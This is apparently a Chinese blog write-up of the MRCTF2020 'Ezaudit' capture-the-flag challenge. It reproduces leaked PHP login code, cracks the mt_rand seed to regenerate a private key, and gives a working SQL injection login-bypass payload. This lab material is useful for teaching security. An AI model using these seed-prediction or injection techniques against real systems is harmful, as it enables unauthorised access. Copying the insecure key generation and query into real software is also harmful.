[MRCTF2020]Ezaudit

最新推荐文章于 2023-10-24 17:54:19 发布
最新推荐文章于 2023-10-24 17:54:19 发布
阅读量273 收藏
点赞数 2
分类专栏: 泄露 PHP很碎的知识点 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115672670
版权

知识点

  • www.zip泄露
  • PHP随机数问题
  • SQL注入

WP

进入环境扫一下常见的文件泄露,发现存在www.zip,下载下来:

<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
            $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
            $link=mysql_connect("localhost","root","root");
            mysql_select_db("test",$link);
            $result = mysql_query($getuser);
            while($row=mysql_fetch_assoc($result)){
                echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
            }
        }
    }

}
// genarate public_key
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    
    return $public_key;
}

//genarate private_key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
$Public_key = public_key();
//$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

这个访问的页面是login.php。前面的post传参没啥好说的,主要问题是那个$Private_key的值我们不知道。
但是看一下下面的公钥和私钥的生成,用到了随机数,而且给了公钥的值,看了一下环境是php5.6,因此考虑爆破一下php 随机数的种子,老套路了,这里不做过多解释了。
写个python跑出来:

string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
publicKey = "KVQP0LdJKRaV3n9D"
result=""

for i in publicKey:
    print(str(string.index(i))+" "+str(string.index(i))+" 0 "+"61",end=" ")

之所以格式是这样,是因为工具的利用格式是4个数字为一组,前两个是随机值的值,后面两个是随机数产生的区间。
然后跑出随机数种子:
在这里插入图片描述
在5.2.1~7.0.x版本的php环境下产生一下私钥:

<?php

function public_key($length = 16) {
    mt_srand(1775196155);
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);

    return $public_key;
}
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
public_key();
echo private_key();

得到是XuNhoueCDCGc
然后接下来是个0难度的SQL注入,直接闭合让其恒成立即可:

username=1&password='or'1'%23&Private_key=XuNhoueCDCGc&login=1

挺简单的一个题目。

bfengj
关注
专栏目录
buu-[MRCTF2020]Xor
qaq517384的博客
03-06 326
32位无壳 执行 ida查看字符串
从零开始做题:[MRCTF2020]不眠之夜-wp
最新发布
weixin_44626085的博客
11-25 1098
从观察题目发现有121张图片,其中1张是损坏的,需要先删除查看发现每张图片的像素大小是200x100(长X高)查看相关信息发现此题涉及到gaps和montage的联合使用montage的作用是把乱序图片先按的总大小拼成一张图gaps的作用是将一张图按指定的size切割并尝试将其拼好。
buuctf_练[MRCTF2020]Ezaudit
m0_66225311的博客
10-24 501
网站源码泄露,代码审计,SQL注入的万能密码使用,`mt_rand`函数的伪随机数漏洞搭配`php_mt_seed`工具使用,随机数特征序列的生成
[MRCTF2020]Hello_ misc
zip471642048的博客
07-28 742
把这些值转化为二进制,提取前两位,得到rar的解压密码rar-passwd0ac1fe6b77be5dbe。打开发现这个zip文件也是有密码的,trytorestoreit.png这个图片里面还有一张图片。解压flag.rar文件得到一个fffflag.zip,发现是docx文件,用pdf打开,修改字体颜色。base64多行解密,替换1为空格得到flagflag{He1Lo_mi5c~}解压第一个提取出来的zip文件,得到一个txt文件。......
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 443
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4336
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3288
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
[MRCTF2020]Ezaudit(随机数的安全)
记录学习,一起进步
01-19 743
[MRCTF2020]Ezaudit(随机数的安全)
[MRCTF2020]Ezaudit WP
車鈊的博客
10-23 506
进入网站 获得源码 看到熟悉的网页模板想到了敏感文档泄露和用户信息查询 点击全部链接,尝试输入邮箱发现不是。 完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本 python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1 发现无论多小的线程速度都会产生429状态码 原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。 只能进行手工检测 发现在www.z
[MRCTF2020]Ezaudit php_mt_seed 伪随机
scrawman的博客
11-30 399
[MRCTF2020]Ezaudit dirsearch扫出来三个文件,访问login.html,,要求我们输入用户名,密码和私钥。用户名从index.php里看出来是crispr,密码用万能密码,主要是这个私钥。 <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username'];
buuctf [MRCTF2020]Ezaudit 伪随机数
为之的博客
07-21 1242
打开网页,看不出什么,直接打开dirmap扫描 扫出了www.zip 下载后有index.php文件 查看源码后大概意思就是 去login.html页面登录,输入账号密码以及私钥,后2个输对了就能得到flag 密码可以直接用万能钥匙 1' or '1'='1 来绕过,主要就是私钥了 这里涉及到mt_srand()函数,伪随机数,即这随机数是我们可以预测的,只要找到该函数在这的种子值就可以预测, 因为公钥私钥都是使用一个种子值来推...
BUUCTF--[MRCTF2020]Ezaudit
qq_46263951的博客
07-15 414
进入页面发现好像也没有可以利用的地方,这里利用网站备份目录扫描脚本和dirsearch来进行扫描 扫描到www.zip、login.php、login.html,在www.zip下载后可以的到 <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $passw.
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值